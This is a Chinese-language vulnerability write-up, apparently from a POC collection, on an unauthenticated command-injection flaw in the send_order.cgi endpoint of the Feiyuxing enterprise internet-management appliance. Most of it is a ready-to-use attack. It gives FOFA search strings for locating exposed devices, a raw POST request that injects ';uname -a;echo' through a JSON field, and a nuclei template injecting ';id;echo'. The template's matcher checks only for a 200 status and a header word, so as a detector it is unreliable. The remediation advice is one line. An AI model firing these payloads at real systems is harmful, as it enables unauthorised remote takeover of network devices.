1.漏洞介绍
飞鱼星企业级智能上网行为管理系统send_order.cgi接口处存在远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,且写入后门文件可获取服务器权限,造成严重威胁。
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:
title="飞鱼星企业"
title="飞鱼星企业级智能上网行为管理系统"
5.POC
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
nuclei检测
id: feixinyu-send-order-rce
info:
name: feixinyu-send-order-rce
author: test
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |-
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
{"opid":"777777777777777777","name":";id;echo ","type":"rest"}
matchers-condition: and
matchers:
- type: word
part: header
words:
- ok
- type: status
status:
- 200
6.修复建议
更新到最新版本